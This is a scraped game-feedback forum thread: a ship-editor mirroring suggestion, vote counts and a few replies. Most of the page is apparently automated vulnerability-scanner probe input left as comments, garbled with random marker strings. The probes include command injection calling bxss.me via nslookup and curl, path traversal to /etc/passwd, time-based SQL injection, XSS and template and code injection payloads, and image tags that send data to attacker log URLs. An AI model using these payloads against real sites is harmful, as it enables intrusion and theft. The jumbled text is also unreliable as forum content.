For the ship editor, you guys need a function where you can build on one side of a line and it repeats on the other side. That way it would be easier to build perfect ships. Kind of like Bubble Tanks 3's ship editor.
559 agree
Vote8109 agree
2895 agree
835 agree
808 agree
793 agree
788 agree
744 agree
742 agree
702 agree
700 agree
689 agree
679 agree
672 agree
664 agree
640 agree
627 agree
626 agree
616 agree
615 agree
613 agree
605 agree
602 agree
601 agree
599 agree
595 agree
590 agree
565 agree
559 agree
558 agree
545 agree
541 agree
533 agree
531 agree
530 agree
526 agree
526 agree
520 agree
518 agree
513 agree
511 agree
505 agree
503 agree
499 agree
498 agree
492 agree
492 agree
478 agree
471 agree
470 agree
448 agree
SiteDestroyer3
I AGREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Tobyoconnell
I second thispumpkin_pips
sounds goodlxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1CztEeBMMxOWfxYANoW
${10000122+9999146}${9999104+9999487}
11DdNrkg9bnO
1WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpgWfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
../../../../../../../../../../../../../../windows/win.iniAnonymous
1WfxYANoW
response.write(9545667*9310319)WfxYANoW
'+response.write(9545667*9310319)+'WfxYANoW
http://bxss.me/t/fit.txt?.jpgWfxYANoW
"+response.write(9545667*9310319)+"WfxYANoW
file:///etc/passwdresponse.write(9661075*9982304)
1WfxYANoW
1WfxYANoW
../1'+response.write(9661075*9982304)+'
1WfxYANoW
/etc/shellsWfxYANoW
echo pcexel$()\ srjtzx\nz^xyu||a #' &echo pcexel$()\ srjtzx\nz^xyu||a #|" &echo pcexel$()\ srjtzx\nz^xyu||a #WfxYANoW
&echo lyelqo$()\ myfedy\nz^xyu||a #' &echo lyelqo$()\ myfedy\nz^xyu||a #|" &echo lyelqo$()\ myfedy\nz^xyu||a #WfxYANoW
K2r7Ut0Pfile:///etc/passwd
1"+response.write(9661075*9982304)+"
1WfxYANoW
1&echo bhlpcj$()\ ztxwsd\nz^xyu||a #' &echo bhlpcj$()\ ztxwsd\nz^xyu||a #|" &echo bhlpcj$()\ ztxwsd\nz^xyu||a #WfxYANoW
1&n999325=v977478WfxYANoW
|echo soytwd$()\ vxrnow\nz^xyu||a #' |echo soytwd$()\ vxrnow\nz^xyu||a #|" |echo soytwd$()\ vxrnow\nz^xyu||a #WfxYANoW
J8BDqUM7: bN5ghr8PWfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
1nCXPiPgn
1WfxYANoW&n929074=v999201
1WfxYANoW
1|echo cwkzpl$()\ ldlfbv\nz^xyu||a #' |echo cwkzpl$()\ ldlfbv\nz^xyu||a #|" |echo cwkzpl$()\ ldlfbv\nz^xyu||a #HgZb1m4v: NuGW0uPk
1WfxYANoW
(nslookup -q=cname hitiwitttefkh1112d.bxss.me||curl hitiwitttefkh1112d.bxss.me))YUlrQmplYjE=
1WfxYANoW
c:/windows/win.iniWfxYANoW
)../WfxYANoW
1WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
bxss.meWfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
';print(md5(31337));$a='WfxYANoW
!(()&&!|*|*|WfxYANoW
^(#$!@#$)(()))******WfxYANoW
1)
11yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1WfxYANoW
'.gethostbyname(lc('hithk'.'lljbferr91646.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(77).chr(117).chr(79).'WfxYANoW
";print(md5(31337));$a="Http://bxss.me/t/fit.txt
1!(()&&!|*|*|
1WfxYANoW
".gethostbyname(lc("hitxf"."yayvmeqwf3a39.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(66).chr(115).chr(71)."http://bxss.me/t/fit.txt?.jpg
1WfxYANoW
gethostbyname(lc('hitrp'.'brjmsjesb2455.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(83).chr(120).chr(68)/etc/shells
1WfxYANoW
'"()WfxYANoW
xfs.bxss.meWfxYANoW
1'&&sleep(27*1000)*xmbypy&&'WfxYANoW
${@print(md5(31337))}WfxYANoW
$(nslookup -q=cname hitusamfddzfi3e0a1.bxss.me||curl hitusamfddzfi3e0a1.bxss.me)^(#$!@#$)(()))******
1xfs.bxss.me
1WfxYANoW
'"WfxYANoW
1"&&sleep(27*1000)*zyubyb&&"c:/windows/win.ini
1WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
<!--WfxYANoW
1'"()&%<zzz><ScRiPt >lK5e(9009)</ScRiPt>WfxYANoW
${@print(md5(31337))}\bxss.me
1WfxYANoW
1'||sleep(27*1000)*utdzqm||'WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(115).concat(80).concat(97).concat(71)+(require"socket" Socket.gethostbyname("hitbu"+"xwmuhubi57891.bxss.me.")[3].to_s)+"'"
1WfxYANoW
&nslookup -q=cname hittuqfdcpfjl7e55b.bxss.me&'\"`0&nslookup -q=cname hittuqfdcpfjl7e55b.bxss.me&`'WfxYANoW
bxss.me/t/xss.html?%00<!--
1WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(117).concat(79).concat(101).concat(80)+(require'socket' Socket.gethostbyname('hitki'+'tnkdlgkkc3c89.bxss.me.')[3].to_s)+'WfxYANoW
1WfxYANoW
&(nslookup -q=cname hitlqpcgojrkt89980.bxss.me||curl hitlqpcgojrkt89980.bxss.me)&'\"`0&(nslookup -q=cname hitlqpcgojrkt89980.bxss.me||curl hitlqpcgojrkt89980.bxss.me)&`'WfxYANoW
1"||sleep(27*1000)*cohwba||"WfxYANoW
commentWfxYANoW
'A'.concat(70-3).concat(22*4).concat(118).concat(67).concat(118).concat(84)+(require'socket' Socket.gethostbyname('hitcn'+'fwjwiovlcc5cf.bxss.me.')[3].to_s)WfxYANoW
|(nslookup -q=cname hitbsckjkkrnx2aff9.bxss.me||curl hitbsckjkkrnx2aff9.bxss.me)WfxYANoW
commentHttP://bxss.me/t/xss.html?%00
1WfxYANoW
'.print(md5(31337)).'WfxYANoW
`(nslookup -q=cname hitttodspporx6e316.bxss.me||curl hitttodspporx6e316.bxss.me)`bxss.me/t/xss.html?%00
1WfxYANoW
comment/.WfxYANoW
;(nslookup -q=cname hitgwytiniduz32c19.bxss.me||curl hitgwytiniduz32c19.bxss.me)|(nslookup -q=cname hitgwytiniduz32c19.bxss.me||curl hitgwytiniduz32c19.bxss.me)&(nslookup -q=cname hitgwytiniduz32c19.bxss.me||curl hitgwytiniduz32c19.bxss.me)comment
1WfxYANoW
1WfxYANoW
'"()&%<zzz><ScRiPt >lK5e(9016)</ScRiPt>comment
1';print(md5(31337));$a='
1comment/.
1";print(md5(31337));$a="
1'"()
1WfxYANoW'&&sleep(27*1000)*zxmzug&&'
1WfxYANoW
19167634${@print(md5(31337))}
1WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitzjuvdakiuk94d7f.bxss.me||curl${IFS}hitzjuvdakiuk94d7f.bxss.me)WfxYANoW
bfg10896<s1﹥s2ʺs3ʹhjl10896WfxYANoW"&&sleep(27*1000)*dgvqyl&&"
1WfxYANoW'||sleep(27*1000)*anjrho||'
1WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hittqjfdvsnjjee200.bxss.me||curl${IFS}hittqjfdvsnjjee200.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hittqjfdvsnjjee200.bxss.me||curl${IFS}hittqjfdvsnjjee200.bxss.me)&`'${@print(md5(31337))}\
1WfxYANoW
<th:t="${dfb}#foreach'.print(md5(31337)).'
1WfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW"||sleep(27*1000)*rnpqps||"
1WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >lK5e(9467)</ScRiPt>WfxYANoW
1<W6PU2U>01OXT[!+!]</W6PU2U>WfxYANoW
1<script>lK5e(9494)</script>WfxYANoW
1<script>lK5e(9276)</script>9276WfxYANoW
1WfxYANoW
1<ScR<ScRiPt>IpT>lK5e(9095)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >lK5e(9097)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9248></ScRiPt>WfxYANoW
1<ScRiPt >lK5e(9691)</ScRiPt>WfxYANoW
1<isindex type=image src=1 onerror=lK5e(9872)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9538'>WfxYANoW
1<body onload=lK5e(9830)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=lK5e(9380)>WfxYANoW
1<img src=xyz OnErRor=lK5e(9377)>WfxYANoW
1<img/src=">" onerror=alert(9990)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%6C%4B%35%65%289806%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\lK5e(9751)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>lK5e(9885)</sCripT>WfxYANoW
1<input autofocus onfocus=lK5e(9767)>WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1x0akoSERWfxYANoW
1}body{zzz:Expre/**/SSion(lK5e(9717))}WfxYANoW
17LvtE <ScRiPt >lK5e(9278)</ScRiPt>WfxYANoW
1<WOUCGD>VAEHG[!+!]</WOUCGD>WfxYANoW
1<ifRAme sRc=9913.com></IfRamE>WfxYANoW
1<aHDaIov x=9681>WfxYANoW
1<img sRc='http://attacker-9439/log.php?WfxYANoW
1<aAVmgDu<WfxYANoW'"()&%<zzz><ScRiPt >lK5e(9177)</ScRiPt>
1'"()&%<zzz><ScRiPt >lK5e(9880)</ScRiPt>
1WfxYANoW9920504
1WfxYANoW
1bfg1261<s1﹥s2ʺs3ʹhjl1261
1WfxYANoW
-1 OR 2+323-323-1=0+0+0+1 --<%={{={@{#{${dfb}}%>
1WfxYANoW
-1 OR 2+796-796-1=0+0+0+1WfxYANoW
-1' OR 2+317-317-1=0+0+0+1 --<th:t="${dfb}#foreach
1WfxYANoW
-1' OR 2+587-587-1=0+0+0+1 or 'kZUwSTZK'='1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1WfxYANoW
-1" OR 2+947-947-1=0+0+0+1 --dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >lK5e(9481)</ScRiPt>
1WfxYANoW<W2PPG6>PIRHX[!+!]</W2PPG6>
1WfxYANoW<script>lK5e(9969)</script>
1WfxYANoW<script>lK5e(9180)</script>9180
1WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW<ScRiPt >lK5e(9906)</ScRiPt>
1WfxYANoW<ScRiPt >lK5e(9859)</ScRiPt>
1WfxYANoW<body onload=lK5e(9620)>
1WfxYANoW<img src=xyz OnErRor=lK5e(9823)>
1WfxYANoW<img/src=">" onerror=alert(9162)>
1WfxYANoW\u003CScRiPt\lK5e(9527)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>lK5e(9980)</sCripT>
1WfxYANoW<input autofocus onfocus=lK5e(9360)>
1<a HrEF=http://xss.bxss.me></a>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(lK5e(9489))}
1WfxYANoWphyFm <ScRiPt >lK5e(9690)</ScRiPt>
1WfxYANoW<W4U1FK>LTRSN[!+!]</W4U1FK>
1WfxYANoW<ifRAme sRc=9267.com></IfRamE>
1WfxYANoW<aJTtypd x=9170>
1WfxYANoW<img sRc='http://attacker-9769/log.php?
1WfxYANoW<aHVbu6F<
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1TMxOSsoX'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 708=(SELECT 708 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 305=(SELECT 305 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 991=(SELECT 991 FROM PG_SLEEP(15))--WfxYANoW
1fklZcQP9' OR 532=(SELECT 532 FROM PG_SLEEP(15))--WfxYANoW
17VWyWzS0') OR 676=(SELECT 676 FROM PG_SLEEP(15))--WfxYANoW
1SSphKfk5')) OR 675=(SELECT 675 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@eAbAAWfxYANoW
1WfxYANoW
1WfxYANoWnvimS6Y3
1WfxYANoW
1-1 OR 2+715-715-1=0+0+0+1 --
1-1 OR 2+62-62-1=0+0+0+1
1-1' OR 2+744-744-1=0+0+0+1 --
1-1' OR 2+663-663-1=0+0+0+1 or 'WlUeWMsN'='
1-1" OR 2+636-636-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWzlt5WQVq'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@jQDZF
1Pecedec150
555-555-0199@example.comPecedec150
555-555-0199@example.comjvtwwcve
1yukebguq
response.write(9426637*9955118)yukebguq
'+response.write(9426637*9955118)+'yukebguq
"+response.write(9426637*9955118)+"response.write(9926971*9017391)
1'+response.write(9926971*9017391)+'
1"+response.write(9926971*9017391)+"
1rxbaivmt
1udbgmpkg
set|set&setrxbaivmt
1udbgmpkg
$(nslookup bKolimfC)rxbaivmt
Os2iDu9Zudbgmpkg
&nslookup i9cNWqvB&'\"`0&nslookup i9cNWqvB&`'rxbaivmt
-1 OR 2+620-620-1=0+0+0+1 --set|set&set
1rxbaivmt
-1 OR 2+69-69-1=0+0+0+1$(nslookup MwCCd98v)
1jkthwyda
OQjhb8Y8rxbaivmt
-1' OR 2+70-70-1=0+0+0+1 --gkasocgx
../../../../../../../../../../etc/passwd&nslookup DcF0ZtBt&'\"`0&nslookup DcF0ZtBt&`'
1ofrrfhgn
1JUj0WZQm
1rxbaivmt
-1' OR 2+342-342-1=0+0+0+1 or 'BCQlxqbV'='oiuxnexh
${9999935+10000009}gkasocgx
../../../../../../../../../../../../../../../proc/versionuotmkbos
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpgcWhBVjF6MEo=
1rxbaivmt
-1" OR 2+308-308-1=0+0+0+1 --${10000094+9999808}
1gkasocgx
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpguotmkbos
1some_inexistent_file_with_long_name.jpgxtbkfbqi
1&n982677=v993213rxbaivmt
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/fqvinyxa
)gkasocgx
../../../../../../../../../../etc/passwd.jpguotmkbos
Http://testasp.vulnweb.com/t/fit.txtrxbaivmt
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/fqvinyxa
!(()&&!|*|*|gkasocgx
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpguotmkbos
http://testasp.vulnweb.com/t/fit.txt?.jpgofrrfhgn
1utjxmfbn&n969858=v940349
1rxbaivmt
-1; waitfor delay '0:0:9' --fqvinyxa
^(#$!@#$)(()))******gkasocgx
/../..//../..//../..//../..//../..//etc/passwd.jpguotmkbos
testasp.vulnweb.comAnonymous
1widdorha
'"()rxbaivmt
-1); waitfor delay '0:0:3' --)
1gkasocgx
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdiqogthrm
;print(md5(acunetix_wvs_security_test));rxbaivmt
-1); waitfor delay '0:0:0' --!(()&&!|*|*|
1gkasocgx
/etc/passwd1some_inexistent_file_with_long_name.jpg
1iqogthrm
';print(md5(acunetix_wvs_security_test));$a=''"()
1rxbaivmt
1 waitfor delay '0:0:3' --^(#$!@#$)(()))******
1gkasocgx
%2fetc%2fpasswdHttp://testasp.vulnweb.com/t/fit.txt
1duerrvqh
http://testasp.vulnweb.com/t/xss.html?%00.jpgiqogthrm
";print(md5(acunetix_wvs_security_test));$a="qlfbaeqd
1rxbaivmt
1 waitfor delay '0:0:0' --dctgwxku
http://hitdrMj1ixZNG.bxss.me/gkasocgx
/.././.././.././.././.././.././.././../etc/./passwd%00http://testasp.vulnweb.com/t/fit.txt?.jpg
1http://testasp.vulnweb.com/t/xss.html?%00.jpg
1iqogthrm
${@print(md5(acunetix_wvs_security_test))}qlfbaeqd
commentrxbaivmt
8mqK3hOY'; waitfor delay '0:0:3' --http://hitiahwv7gFgE.bxss.me/
1gkasocgx
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdtestasp.vulnweb.com
1ngutsieg
1iqogthrm
${@print(md5(acunetix_wvs_security_test))}\qlfbaeqd
commentrxbaivmt
IbXntOiq'; waitfor delay '0:0:6' --fvuqhfav
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))gkasocgx
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdxokfmywr
/www.vulnweb.comngutsieg
1'";print(md5(acunetix_wvs_security_test));
1qlfbaeqd
comment/.rxbaivmt
-1;select pg_sleep(3); --/www.vulnweb.com
1ngutsieg
\';print(md5(acunetix_wvs_security_test));$a='
1qlfbaeqd
1rxbaivmt
-1;select pg_sleep(6); --gnimignh
'"gkasocgx
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.kmxdtuet
1'"()&%<acx><ScRiPt >IpGE(9852)</ScRiPt>";print(md5(acunetix_wvs_security_test));$a="
1comment
1rxbaivmt
-1);select pg_sleep(3); --gnimignh
<!--gkasocgx
file:///etc/passwdngutsieg
@@dqj7b${@print(md5(acunetix_wvs_security_test))}
1comment
1rxbaivmt
-1);select pg_sleep(9); --'"
1gkasocgx
/\../\../\../\../\../\../\../etc/passwdngutsieg
JyI=kmxdtuet
'"()&%<acx><ScRiPt >IpGE(9080)</ScRiPt>${@print(md5(acunetix_wvs_security_test))}\
1comment/.
1rxbaivmt
-1));select pg_sleep(3); --<!--
1gkasocgx
WEB-INF/web.xmlrxbaivmt
-1));select pg_sleep(9); --gkasocgx
/WEB-INF/web.xmlrxbaivmt
PnaeN7RI';select pg_sleep(6); --kmxdtuet
1_9716gkasocgx
WEB-INF\web.xmlrxbaivmt
PwmbCrCr');select pg_sleep(6); --ngutsieg
(select convert(int,CHAR(65)))../../../../../../../../../../etc/passwd
1rxbaivmt
hohtlha3'));select pg_sleep(6); --ngutsieg
1kmxdtuet
acu10683<s1﹥s2ʺs3ʹuca10683rxbaivmt
11'"
1rxbaivmt
1\
1UiGB3MqZ
1-1 OR 2+365-365-1=0+0+0+1 --
1@@IAPva
1JyI=
1-1 OR 2+406-406-1=0+0+0+1
1-1' OR 2+254-254-1=0+0+0+1 --
1-1' OR 2+912-912-1=0+0+0+1 or 'xvYodf9b'='
1(select convert(int,CHAR(65)))
1-1" OR 2+570-570-1=0+0+0+1 --
1kmxdtuet
{{9999973*9999346}}1 waitfor delay '0:0:4' --
1../../../../../../../../../../etc/passwd.jpg
1NtRvRGUN'; waitfor delay '0:0:4' --
1Cce4dLj7';select pg_sleep(8); --
1kmxdtuet
1<ScRiPt >IpGE(9418)</ScRiPt>Cp4EcsmM');select pg_sleep(8); --
1ylRKVM5h'));select pg_sleep(8); --
1kmxdtuet
1<WCFVEI>PEXWG[!+!]</WCFVEI>kmxdtuet
1<script>IpGE(9436)</script>kmxdtuet
1<ScR<ScRiPt>IpT>IpGE(9429)</sCr<ScRiPt>IpT>kmxdtuet
1<ScRiPt >IpGE(9626)</ScRiPt>kmxdtuet
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9761></ScRiPt>kmxdtuet
1<ScRiPt >IpGE(9726)</ScRiPt>kmxdtuet
1<video><source onerror="javascript:IpGE(9911)">kmxdtuet
1<isindex type=image src=1 onerror=IpGE(9810)>kmxdtuet
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9077'>.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1/etc/passwd
1%2fetc%2fpasswd
1kmxdtuet
1<body onload=IpGE(9907)>kmxdtuet
1<img src=//testasp.vulnweb.com/t/dot.gif onload=IpGE(9242)>file:///etc/passwd
1/\../\../\../\../\../\../\../etc/passwd
1kmxdtuet
1<img src=xyz OnErRor=IpGE(9127)>WEB-INF/web.xml
1/WEB-INF/web.xml
1WEB-INF\web.xml
1kmxdtuet
1<img/src=">" onerror=alert(9674)>kmxdtuet
%31%3C%53%63%52%69%50%74%20%3E%49%70%47%45%289270%29%3C%2F%73%43%72%69%70%54%3Ekmxdtuet
1\u003CScRiPt\IpGE(9270)\u003C/sCripT\u003Ekmxdtuet
1<ScRiPt>IpGE(9786)</sCripT>kmxdtuet
1<input autofocus onfocus=IpGE(9932)>kmxdtuet
<a HrEF=http://www.vulnweb.com></a>kmxdtuet
<a HrEF=jaVaScRiPT:>kmxdtuet
[url=http://www.vulnweb.com][/url]kmxdtuet
1<img<!-- --> src=x onerror=alert(9654);//><!-- -->kmxdtuet
1}body{acu:Expre/**/SSion(IpGE(9816))}kmxdtuet
1<% contenteditable onresize=IpGE(9414)>kmxdtuet
1_lqyf7 <ScRiPt >IpGE(9713)</ScRiPt>kmxdtuet
1<WCGHRF>LWFJJ[!+!]</WCGHRF>kmxdtuet
1<ifRAme sRc=9900.com></IfRamE>kmxdtuet
1<YD3NVo x=9590>kmxdtuet
1<img sRc='http://attacker-9533/log.php?kmxdtuet'"()&%<acx><ScRiPt >IpGE(9193)</ScRiPt>
1'"()&%<acx><ScRiPt >IpGE(9144)</ScRiPt>
1kmxdtuet_9898
1acu8396<s1﹥s2ʺs3ʹuca8396
1{{10000229*10000492}}
1kmxdtuet<ScRiPt >IpGE(9517)</ScRiPt>
1kmxdtuet<WGULAA>WI9SW[!+!]</WGULAA>
1kmxdtuet<script>IpGE(9527)</script>
1kmxdtuet<ScRiPt >IpGE(9696)</ScRiPt>
1kmxdtuet<ScRiPt >IpGE(9456)</ScRiPt>
1kmxdtuet<body onload=IpGE(9480)>
1kmxdtuet<img src=xyz OnErRor=IpGE(9029)>
1kmxdtuet<img/src=">" onerror=alert(9462)>
1kmxdtuet\u003CScRiPt\IpGE(9611)\u003C/sCripT\u003E
1kmxdtuet<ScRiPt>IpGE(9696)</sCripT>
1kmxdtuet<input autofocus onfocus=IpGE(9732)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1kmxdtuet}body{acu:Expre/**/SSion(IpGE(9040))}
1kmxdtuet<% contenteditable onresize=IpGE(9148)>
1kmxdtuet_A94Ew <ScRiPt >IpGE(9596)</ScRiPt>
1kmxdtuet<WG2B1C>7IAT1[!+!]</WG2B1C>
1kmxdtuet<ifRAme sRc=9685.com></IfRamE>
1kmxdtuet<uzx1Up x=9593>
1kmxdtuet<img sRc='http://attacker-9143/log.php?
1dwUQQUrL
1dwUQQUrL
1dwUQQUrL
1dwUQQUrL
1p0IAv9q3dwUQQUrL
1dwUQQUrL
-1 OR 2+759-759-1=0+0+0+1 --dwUQQUrL
-1 OR 2+704-704-1=0+0+0+1dwUQQUrL
-1' OR 2+92-92-1=0+0+0+1 --dwUQQUrL
-1' OR 2+788-788-1=0+0+0+1 or '6YaEParI'='dwUQQUrL
-1" OR 2+498-498-1=0+0+0+1 --dwUQQUrL
1*if(now()=sysdate(),sleep(15),0)dwUQQUrL
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZdwUQQUrL
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZdwUQQUrL
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/dwUQQUrL
1-1; waitfor delay '0:0:15' --dwUQQUrL
1-1); waitfor delay '0:0:15' --dwUQQUrL
1-1 waitfor delay '0:0:15' --dwUQQUrL
1sxulEwB3'; waitfor delay '0:0:15' --dwUQQUrL
1-1 OR 647=(SELECT 647 FROM PG_SLEEP(15))--dwUQQUrL
1-1) OR 106=(SELECT 106 FROM PG_SLEEP(15))--dwUQQUrL
1-1)) OR 486=(SELECT 486 FROM PG_SLEEP(15))--dwUQQUrL
139TzEJA1' OR 962=(SELECT 962 FROM PG_SLEEP(15))--dwUQQUrL
1zMAPUqB8') OR 843=(SELECT 843 FROM PG_SLEEP(15))--dwUQQUrL
13gDlX17k')) OR 62=(SELECT 62 FROM PG_SLEEP(15))--dwUQQUrL
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)dwUQQUrL
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'dwUQQUrL
1dwUQQUrL
1'"dwUQQUrL
@@8OksKdwUQQUrL
1dwUQQUrL
1dwUQQUrLXCNql79C
1dwUQQUrL
1-1 OR 2+410-410-1=0+0+0+1 --
1-1 OR 2+193-193-1=0+0+0+1
1-1' OR 2+619-619-1=0+0+0+1 --
1-1' OR 2+536-536-1=0+0+0+1 or '5ik5uhmr'='
1-1" OR 2+192-192-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1dwUQQUrL-1 waitfor delay '0:0:15' --
1dwUQQUrLtvsdXEyZ'; waitfor delay '0:0:15' --
1dwUQQUrL
1dwUQQUrL'"
1@@AxUIN
1dwUQQUrL
1Comment